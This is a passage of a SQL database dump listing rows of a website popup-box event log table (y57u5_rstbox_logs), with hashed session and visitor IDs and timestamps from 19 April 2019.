(79801, '0a46b5ef1743772bb7a1cb76acc8ed4a', '7501b42c35accff7', 0, 2, 1, '2019-04-19 15:52:54'),
(79802, 'b01d1e29da03c10289554d07139cb304', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-19 15:53:30'),
(79803, 'b01d1e29da03c10289554d07139cb304', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-19 15:53:46'),
(79804, 'b01d1e29da03c10289554d07139cb304', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-19 15:54:13'),
(79805, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 15:54:41'),
(79806, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 15:55:15'),
(79807, '2f84ed3ec4042cfdb1a4c68bac633445', 'b4e5d447b0500ad0', 0, 2, 1, '2019-04-19 15:55:39'),
(79808, 'b01d1e29da03c10289554d07139cb304', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-19 15:56:17'),
(79809, '30cafe0beb78e6da4793da689d46024f', '2ea7201b0e939b00', 0, 2, 1, '2019-04-19 15:56:25'),
(79810, '691a8be1dbe1d3cb7523071d49c04101', '3de88ff4581dab27', 0, 2, 1, '2019-04-19 15:57:17'),
(79811, 'c705ab3fdbd6a79b316a05c7ce9592a9', 'f812ddc410079b99', 0, 2, 1, '2019-04-19 15:59:25'),
(79812, '2f84ed3ec4042cfdb1a4c68bac633445', 'b4e5d447b0500ad0', 0, 2, 1, '2019-04-19 16:00:32'),
(79813, 'ff8b805c0c789e866f91e8b3f6b68282', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-19 16:02:06'),
(79814, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:02:33'),
(79815, 'b560166387ac23ea4a7d682ef4e181d6', '2487dcc4e2703639', 0, 2, 1, '2019-04-19 16:02:42'),
(79816, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 16:02:49'),
(79817, 'b560166387ac23ea4a7d682ef4e181d6', '2487dcc4e2703639', 0, 2, 1, '2019-04-19 16:02:51'),
(79818, 'b560166387ac23ea4a7d682ef4e181d6', '2487dcc4e2703639', 0, 2, 1, '2019-04-19 16:03:00'),
(79819, '048b6ab11a8634bc8f85e75c0bcc1f9b', 'c4f5984dd63dea00', 0, 2, 1, '2019-04-19 16:03:01'),
(79820, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:03:08'),
(79821, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:03:22'),
(79822, 'b01d1e29da03c10289554d07139cb304', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-19 16:03:35'),
(79823, 'bc6410418ae549c8b31522a6fa0ea8e9', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-19 16:03:40'),
(79824, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:03:43'),
(79825, '048b6ab11a8634bc8f85e75c0bcc1f9b', 'c4f5984dd63dea00', 0, 2, 1, '2019-04-19 16:03:51'),
(79826, '3fd3eb34a5cfa7ee17aac1907ae04cbd', 'b53c70bea01d2d6e', 0, 2, 1, '2019-04-19 16:03:52'),
(79827, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:03:53'),
(79828, 'b01d1e29da03c10289554d07139cb304', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-19 16:05:49'),
(79829, 'b01d1e29da03c10289554d07139cb304', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-19 16:06:35'),
(79830, 'b01d1e29da03c10289554d07139cb304', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-19 16:06:46'),
(79831, '5059b3861ce9fef76208ebbad2f8e182', '706a9e7b9b736be5', 0, 2, 1, '2019-04-19 16:08:20'),
(79832, '5059b3861ce9fef76208ebbad2f8e182', '706a9e7b9b736be5', 0, 2, 1, '2019-04-19 16:08:40'),
(79833, '0a46b5ef1743772bb7a1cb76acc8ed4a', '7501b42c35accff7', 0, 2, 1, '2019-04-19 16:08:55'),
(79834, 'dcd4b4eff5d472a66e81c4ae59d4ba98', 'a639f655bef0fc87', 0, 2, 1, '2019-04-19 16:09:28'),
(79835, '66b193ff4c8bc87ea4e0550f49204410', 'b79d88d8e513e980', 0, 2, 1, '2019-04-19 16:10:00'),
(79836, 'afc9769cd70285ca00264e8b73df86b8', 'b2bafb74467116e9', 0, 2, 1, '2019-04-19 16:10:29'),
(79837, 'b48798695a43b7bdadaa50db435d903e', '2622b37d94f09b78', 0, 2, 1, '2019-04-19 16:10:59'),
(79838, 'afc9769cd70285ca00264e8b73df86b8', 'b2bafb74467116e9', 0, 2, 1, '2019-04-19 16:11:08'),
(79839, '2cb49cfbbe4e4d68f604f41c90d40341', '3affdb6d237dd814', 0, 2, 1, '2019-04-19 16:11:30'),
(79840, 'e59865a32f1288ffcbdb1806c49f77b6', '50d02461c9e1908b', 0, 2, 1, '2019-04-19 16:11:35'),
(79841, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:12:11'),
(79842, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:12:27'),
(79843, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 16:12:42'),
(79844, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:12:44'),
(79845, 'e4a33130712ccaf18b948eec4002986b', 'e50451d6d332bac5', 0, 2, 1, '2019-04-19 16:12:45'),
(79846, 'e4a33130712ccaf18b948eec4002986b', 'e50451d6d332bac5', 0, 2, 1, '2019-04-19 16:12:55'),
(79847, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 16:13:04'),
(79848, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:13:05'),
(79849, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:13:40'),
(79850, '0a46b5ef1743772bb7a1cb76acc8ed4a', '7501b42c35accff7', 0, 2, 1, '2019-04-19 16:13:43'),
(79851, '0a46b5ef1743772bb7a1cb76acc8ed4a', '7501b42c35accff7', 0, 2, 1, '2019-04-19 16:13:47'),
(79852, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:13:54'),
(79853, 'e2bc8b674a49919830ce1927ea0e614a', 'f19010d8a5f137d0', 0, 2, 1, '2019-04-19 16:14:05'),
(79854, '74e31b957ed3a9e53d0a4da1fb9e1fba', '863b661787591b2d', 0, 2, 1, '2019-04-19 16:14:19'),
(79855, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 16:14:19'),
(79856, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:14:28'),
(79857, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:14:29'),
(79858, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:14:39'),
(79859, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:15:24'),
(79860, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:15:30'),
(79861, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:15:37'),
(79862, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:15:48'),
(79863, 'b48798695a43b7bdadaa50db435d903e', '2622b37d94f09b78', 0, 2, 1, '2019-04-19 16:15:48'),
(79864, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:15:49'),
(79865, '8d0f2a38dfdb91267e0891971544c0c7', '21feaec51d7a84c2', 0, 2, 1, '2019-04-19 16:16:01'),
(79866, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:16:03'),
(79867, 'ff8b805c0c789e866f91e8b3f6b68282', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-19 16:16:06'),
(79868, '2f84ed3ec4042cfdb1a4c68bac633445', 'b4e5d447b0500ad0', 0, 2, 1, '2019-04-19 16:16:07'),
(79869, 'e2bc8b674a49919830ce1927ea0e614a', 'f19010d8a5f137d0', 0, 2, 1, '2019-04-19 16:16:10'),
(79870, '8d0f2a38dfdb91267e0891971544c0c7', '21feaec51d7a84c2', 0, 2, 1, '2019-04-19 16:16:11'),
(79871, 'b48798695a43b7bdadaa50db435d903e', '2622b37d94f09b78', 0, 2, 1, '2019-04-19 16:16:24'),
(79872, '23f8078bc835004eb7c79ee708667852', '7b16863d40230e2a', 0, 2, 1, '2019-04-19 16:16:25'),
(79873, '98a5917cc83e012e45383ca9f6e13b83', '3e9a5f85df12594b', 0, 2, 1, '2019-04-19 16:16:26'),
(79874, '8d0f2a38dfdb91267e0891971544c0c7', '21feaec51d7a84c2', 0, 2, 1, '2019-04-19 16:16:27'),
(79875, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 16:16:30'),
(79876, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:16:31'),
(79877, '06a8432d82c2b03c950390c1bc8e31c6', 'ef135ae455c933ae', 0, 2, 1, '2019-04-19 16:16:32'),
(79878, 'b48798695a43b7bdadaa50db435d903e', '2622b37d94f09b78', 0, 2, 1, '2019-04-19 16:16:33'),
(79879, '98a5917cc83e012e45383ca9f6e13b83', '3e9a5f85df12594b', 0, 2, 1, '2019-04-19 16:16:36'),
(79880, '0a46b5ef1743772bb7a1cb76acc8ed4a', '7501b42c35accff7', 0, 2, 1, '2019-04-19 16:16:39'),
(79881, '23f8078bc835004eb7c79ee708667852', '7b16863d40230e2a', 0, 2, 1, '2019-04-19 16:16:47'),
(79882, '691a8be1dbe1d3cb7523071d49c04101', '3de88ff4581dab27', 0, 2, 1, '2019-04-19 16:16:50'),
(79883, '3d8190794247dff28eb463771e43e59e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-19 16:16:53'),
(79884, 'e59865a32f1288ffcbdb1806c49f77b6', '50d02461c9e1908b', 0, 2, 1, '2019-04-19 16:17:10'),
(79885, '23f8078bc835004eb7c79ee708667852', '7b16863d40230e2a', 0, 2, 1, '2019-04-19 16:17:25'),
(79886, '23f8078bc835004eb7c79ee708667852', '7b16863d40230e2a', 0, 2, 1, '2019-04-19 16:17:30'),
(79887, 'dcd4b4eff5d472a66e81c4ae59d4ba98', 'a639f655bef0fc87', 0, 2, 1, '2019-04-19 16:17:32'),
(79888, '74e31b957ed3a9e53d0a4da1fb9e1fba', '863b661787591b2d', 0, 2, 1, '2019-04-19 16:17:37'),
(79889, '23f8078bc835004eb7c79ee708667852', '7b16863d40230e2a', 0, 2, 1, '2019-04-19 16:17:41'),
(79890, 'ff8b805c0c789e866f91e8b3f6b68282', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-19 16:17:43'),
(79891, '00236c8d2ded0ff1740257468ecab842', 'e3163f1046dc4449', 0, 2, 1, '2019-04-19 16:17:59'),
(79892, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:18:04'),
(79893, '00236c8d2ded0ff1740257468ecab842', 'e3163f1046dc4449', 0, 2, 1, '2019-04-19 16:18:07'),
(79894, '00236c8d2ded0ff1740257468ecab842', 'e3163f1046dc4449', 0, 2, 1, '2019-04-19 16:18:18'),
(79895, 'ff8b805c0c789e866f91e8b3f6b68282', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-19 16:18:18'),
(79896, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 16:18:39'),
(79897, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:18:41'),
(79898, '0a46b5ef1743772bb7a1cb76acc8ed4a', '7501b42c35accff7', 0, 2, 1, '2019-04-19 16:19:05'),
(79899, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 16:19:06'),
(79900, '8d43513a969e644e697f733a44cca018', '276e6c253282b236', 0, 2, 1, '2019-04-19 16:19:08'),
(79901, '301cb30d827859c98ce07f7a008481da', '0c48ec3b7b4a58d8', 0, 2, 1, '2019-04-19 16:19:14'),
(79902, 'afc9769cd70285ca00264e8b73df86b8', 'b2bafb74467116e9', 0, 2, 1, '2019-04-19 16:19:15'),
(79903, '301cb30d827859c98ce07f7a008481da', '0c48ec3b7b4a58d8', 0, 2, 1, '2019-04-19 16:19:19'),
(79904, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 16:19:19'),
(79905, 'e59865a32f1288ffcbdb1806c49f77b6', '50d02461c9e1908b', 0, 2, 1, '2019-04-19 16:19:19'),
(79906, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:19:21'),
(79907, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:19:28'),
(79908, 'b48798695a43b7bdadaa50db435d903e', '2622b37d94f09b78', 0, 2, 1, '2019-04-19 16:19:28'),
(79909, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:19:37'),
(79910, 'a55af58538e94d23a0f870d3101f9d5d', '82d02965d8118d03', 0, 2, 1, '2019-04-19 16:19:37'),
(79911, '691a8be1dbe1d3cb7523071d49c04101', '3de88ff4581dab27', 0, 2, 1, '2019-04-19 16:19:41'),
(79912, 'ff8b805c0c789e866f91e8b3f6b68282', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-19 16:19:45'),
(79913, '06a8432d82c2b03c950390c1bc8e31c6', 'ef135ae455c933ae', 0, 2, 1, '2019-04-19 16:19:51'),
(79914, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:19:57'),
(79915, '74e31b957ed3a9e53d0a4da1fb9e1fba', '863b661787591b2d', 0, 2, 1, '2019-04-19 16:20:01'),
(79916, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 16:20:03'),
(79917, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:20:04'),
(79918, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:20:05'),
(79919, '7ac945f0c036fd3f81856b95051a7601', 'cda261d12b88a47f', 0, 2, 1, '2019-04-19 16:20:06'),
(79920, 'ff8b805c0c789e866f91e8b3f6b68282', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-19 16:20:09'),
(79921, '10c4ba6270459f84e4fd050cd0b5529d', 'e2c6c22d01e08258', 0, 2, 1, '2019-04-19 16:20:10'),
(79922, 'dcd4b4eff5d472a66e81c4ae59d4ba98', 'a639f655bef0fc87', 0, 2, 1, '2019-04-19 16:20:16'),
(79923, '8d43513a969e644e697f733a44cca018', '276e6c253282b236', 0, 2, 1, '2019-04-19 16:20:31'),
(79924, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:20:34'),
(79925, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:20:43'),
(79926, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 16:20:45'),
(79927, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:20:48'),
(79928, '74e31b957ed3a9e53d0a4da1fb9e1fba', '863b661787591b2d', 0, 2, 1, '2019-04-19 16:20:59'),
(79929, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 16:21:21'),
(79930, 'e2bc8b674a49919830ce1927ea0e614a', 'f19010d8a5f137d0', 0, 2, 1, '2019-04-19 16:21:26'),
(79931, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 16:21:29'),
(79932, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:21:31'),
(79933, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:21:34'),
(79934, '34d63e8cfb2642ae1285ac5254fef8c9', '8e194eafcd6df397', 0, 2, 1, '2019-04-19 16:21:34'),
(79935, '3d8190794247dff28eb463771e43e59e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-19 16:21:46'),
(79936, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 16:21:53'),
(79937, '1a7e09a5ebe53969d968982a6a940914', '48ae1f588b0d2ee6', 0, 2, 1, '2019-04-19 16:22:07'),
(79938, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 16:22:14'),
(79939, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 16:22:17'),
(79940, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 16:22:22'),
(79941, '3d8190794247dff28eb463771e43e59e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-19 16:22:25'),
(79942, '541b7bd30537e3be2801a445e2e939ce', '017e53ba57d5ea05', 0, 2, 1, '2019-04-19 16:22:42'),
(79943, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 16:22:49'),
(79944, '98a5917cc83e012e45383ca9f6e13b83', '3e9a5f85df12594b', 0, 2, 1, '2019-04-19 16:22:54'),
(79945, '98a5917cc83e012e45383ca9f6e13b83', '3e9a5f85df12594b', 0, 2, 1, '2019-04-19 16:23:06'),
(79946, '0a46b5ef1743772bb7a1cb76acc8ed4a', '7501b42c35accff7', 0, 2, 1, '2019-04-19 16:23:26'),
(79947, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:23:31'),
(79948, 'ff8b805c0c789e866f91e8b3f6b68282', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-19 16:23:32'),
(79949, '64a8b2e696135bd1ebcaf39af4226e4d', 'fd5f23094d82de32', 0, 2, 1, '2019-04-19 16:23:44'),
(79950, '8b076783d30191dec2dd0b604f4b5a2d', '34de0127947b52ab', 0, 2, 1, '2019-04-19 16:23:45'),
(79951, '3d8190794247dff28eb463771e43e59e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-19 16:24:00'),
(79952, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 16:24:12'),
(79953, '3d8190794247dff28eb463771e43e59e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-19 16:24:17'),
(79954, 'ff8b805c0c789e866f91e8b3f6b68282', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-19 16:24:37'),
(79955, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 16:24:57'),
(79956, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:25:01'),
(79957, '98a5917cc83e012e45383ca9f6e13b83', '3e9a5f85df12594b', 0, 2, 1, '2019-04-19 16:25:04'),
(79958, '98a5917cc83e012e45383ca9f6e13b83', '3e9a5f85df12594b', 0, 2, 1, '2019-04-19 16:25:23'),
(79959, '0a46b5ef1743772bb7a1cb76acc8ed4a', '7501b42c35accff7', 0, 2, 1, '2019-04-19 16:25:58'),
(79960, '10c4ba6270459f84e4fd050cd0b5529d', 'e2c6c22d01e08258', 0, 2, 1, '2019-04-19 16:25:58'),
(79961, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 16:26:06'),
(79962, 'eebe8323c2877f3cc4ea9a9a990848ab', '0d2981729acc8395', 0, 2, 1, '2019-04-19 16:26:18'),
(79963, '0a46b5ef1743772bb7a1cb76acc8ed4a', '7501b42c35accff7', 0, 2, 1, '2019-04-19 16:26:33'),
(79964, 'be469e1c76fec82ad7f2653ad1b33ed7', '4df5ced8675ad994', 0, 2, 1, '2019-04-19 16:26:50'),
(79965, '216d0d98ecb3c1a5e8edb3d980d6bf84', 'f10990f26adcd1c5', 0, 2, 1, '2019-04-19 16:26:51'),
(79966, '23f8078bc835004eb7c79ee708667852', '7b16863d40230e2a', 0, 2, 1, '2019-04-19 16:27:19'),
(79967, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 16:27:22'),
(79968, 'b48798695a43b7bdadaa50db435d903e', '2622b37d94f09b78', 0, 2, 1, '2019-04-19 16:27:35'),
(79969, 'b48798695a43b7bdadaa50db435d903e', '2622b37d94f09b78', 0, 2, 1, '2019-04-19 16:27:44'),
(79970, 'f06c58e8af90df893f14ea8717a5c206', '1624785298a8447a', 0, 2, 1, '2019-04-19 16:27:52'),
(79971, 'f06c58e8af90df893f14ea8717a5c206', '1624785298a8447a', 0, 2, 1, '2019-04-19 16:28:14'),
(79972, 'b48798695a43b7bdadaa50db435d903e', '2622b37d94f09b78', 0, 2, 1, '2019-04-19 16:28:17'),
(79973, 'b48798695a43b7bdadaa50db435d903e', '2622b37d94f09b78', 0, 2, 1, '2019-04-19 16:28:23'),
(79974, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:28:27'),
(79975, 'b48798695a43b7bdadaa50db435d903e', '2622b37d94f09b78', 0, 2, 1, '2019-04-19 16:28:38'),
(79976, '23f8078bc835004eb7c79ee708667852', '7b16863d40230e2a', 0, 2, 1, '2019-04-19 16:28:48'),
(79977, '93eeec6f39849d8385eccae504531af0', '9e0d2d6ec4e6ebaa', 0, 2, 1, '2019-04-19 16:29:04'),
(79978, '3f395593ac998200e47c090826ed8cf1', 'edfe950d47379572', 0, 2, 1, '2019-04-19 16:29:08'),
(79979, '181f93266d2c00b57b701cd85fef0994', 'fd5f23094d82de32', 0, 2, 1, '2019-04-19 16:29:13'),
(79980, '3f395593ac998200e47c090826ed8cf1', 'edfe950d47379572', 0, 2, 1, '2019-04-19 16:29:13'),
(79981, 'e2bc8b674a49919830ce1927ea0e614a', 'f19010d8a5f137d0', 0, 2, 1, '2019-04-19 16:29:22'),
(79982, '181f93266d2c00b57b701cd85fef0994', 'fd5f23094d82de32', 0, 2, 1, '2019-04-19 16:29:31'),
(79983, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 16:30:00'),
(79984, 'afc9769cd70285ca00264e8b73df86b8', 'b2bafb74467116e9', 0, 2, 1, '2019-04-19 16:31:20'),
(79985, '23f8078bc835004eb7c79ee708667852', '7b16863d40230e2a', 0, 2, 1, '2019-04-19 16:31:24'),
(79986, 'ecd63923f7e931ace38b91ff7b621f18', '461b6ce2b519cdc8', 0, 2, 1, '2019-04-19 16:31:57'),
(79987, '73166b034146e34c75a9dc5c7023604d', 'b79d88d8e513e980', 0, 2, 1, '2019-04-19 16:32:12'),
(79988, '23f8078bc835004eb7c79ee708667852', '7b16863d40230e2a', 0, 2, 1, '2019-04-19 16:32:26'),
(79989, 'e4a33130712ccaf18b948eec4002986b', 'e50451d6d332bac5', 0, 2, 1, '2019-04-19 16:32:31'),
(79990, '23f8078bc835004eb7c79ee708667852', '7b16863d40230e2a', 0, 2, 1, '2019-04-19 16:32:59'),
(79991, 'e2bc8b674a49919830ce1927ea0e614a', 'f19010d8a5f137d0', 0, 2, 1, '2019-04-19 16:33:22'),
(79992, '8b076783d30191dec2dd0b604f4b5a2d', '34de0127947b52ab', 0, 2, 1, '2019-04-19 16:34:40'),
(79993, '23f8078bc835004eb7c79ee708667852', '7b16863d40230e2a', 0, 2, 1, '2019-04-19 16:35:01'),
(79994, 'dcd4b4eff5d472a66e81c4ae59d4ba98', 'a639f655bef0fc87', 0, 2, 1, '2019-04-19 16:35:28'),
(79995, '5059b3861ce9fef76208ebbad2f8e182', '706a9e7b9b736be5', 0, 2, 1, '2019-04-19 16:35:40'),
(79996, '06a8f97d5e18f54c1a71a0c174c2fd25', 'e9d10c7f7af3c7c6', 0, 2, 1, '2019-04-19 16:36:25'),
(79997, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:37:01'),
(79998, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:37:14'),
(79999, '0a46b5ef1743772bb7a1cb76acc8ed4a', '7501b42c35accff7', 0, 2, 1, '2019-04-19 16:37:29'),
(80000, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 16:37:35'),
(80001, 'f97c24fd5f096cc7fa6971d8ee3b8155', '00cfdd65313a346b', 0, 2, 1, '2019-04-19 16:37:35'),
(80002, 'afc9769cd70285ca00264e8b73df86b8', 'b2bafb74467116e9', 0, 2, 1, '2019-04-19 16:37:48'),
(80003, 'ff8b805c0c789e866f91e8b3f6b68282', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-19 16:37:53'),
(80004, '9c016987d21406732d6d7e28c4ce759d', '0d5e824dcbe521e8', 0, 2, 1, '2019-04-19 16:38:08'),
(80005, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 16:38:16'),
(80006, '4c8a6e27a57a3aa34660834183bad026', '135f23c8a85974ba', 0, 2, 1, '2019-04-19 16:38:23'),
(80007, '3db39c5bfce217b550e4b392bf5548b5', '269602a3a196c858', 0, 2, 1, '2019-04-19 16:38:28'),
(80008, 'be469e1c76fec82ad7f2653ad1b33ed7', '4df5ced8675ad994', 0, 2, 1, '2019-04-19 16:38:29'),
(80009, '1a7e09a5ebe53969d968982a6a940914', '48ae1f588b0d2ee6', 0, 2, 1, '2019-04-19 16:38:46'),
(80010, 'ff8b805c0c789e866f91e8b3f6b68282', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-19 16:38:48'),
(80011, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 16:38:54'),
(80012, '3d8190794247dff28eb463771e43e59e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-19 16:38:56'),
(80013, '691a8be1dbe1d3cb7523071d49c04101', '3de88ff4581dab27', 0, 2, 1, '2019-04-19 16:39:02'),
(80014, '06a8432d82c2b03c950390c1bc8e31c6', 'ef135ae455c933ae', 0, 2, 1, '2019-04-19 16:39:11'),
(80015, 'afc9769cd70285ca00264e8b73df86b8', 'b2bafb74467116e9', 0, 2, 1, '2019-04-19 16:39:16'),
(80016, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 16:39:19'),
(80017, '73166b034146e34c75a9dc5c7023604d', 'b79d88d8e513e980', 0, 2, 1, '2019-04-19 16:39:24'),
(80018, '3d8190794247dff28eb463771e43e59e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-19 16:39:29'),
(80019, '9c016987d21406732d6d7e28c4ce759d', '0d5e824dcbe521e8', 0, 2, 1, '2019-04-19 16:39:31'),
(80020, '8b076783d30191dec2dd0b604f4b5a2d', '34de0127947b52ab', 0, 2, 1, '2019-04-19 16:39:50'),
(80021, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 16:40:09'),
(80022, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 16:40:15'),
(80023, '16f3fcfc6526c71ed109161a7924c37c', 'eb0df83514b09317', 0, 2, 1, '2019-04-19 16:40:19'),
(80024, '16f3fcfc6526c71ed109161a7924c37c', 'eb0df83514b09317', 0, 2, 1, '2019-04-19 16:40:23'),
(80025, '1ab7afd5c009ca1541713a27108464e8', 'e996039688368fa6', 0, 2, 1, '2019-04-19 16:40:24'),
(80026, '9c016987d21406732d6d7e28c4ce759d', '0d5e824dcbe521e8', 0, 2, 1, '2019-04-19 16:40:37'),
(80027, '1ab7afd5c009ca1541713a27108464e8', 'e996039688368fa6', 0, 2, 1, '2019-04-19 16:40:41');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(80028, '691a8be1dbe1d3cb7523071d49c04101', '3de88ff4581dab27', 0, 2, 1, '2019-04-19 16:40:47'),
(80029, '4f7d8a700513d26753d1c321d179a0bd', 'a2a455ee27dc8a2c', 0, 2, 1, '2019-04-19 16:40:49'),
(80030, '691a8be1dbe1d3cb7523071d49c04101', '3de88ff4581dab27', 0, 2, 1, '2019-04-19 16:40:58'),
(80031, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 16:40:58'),
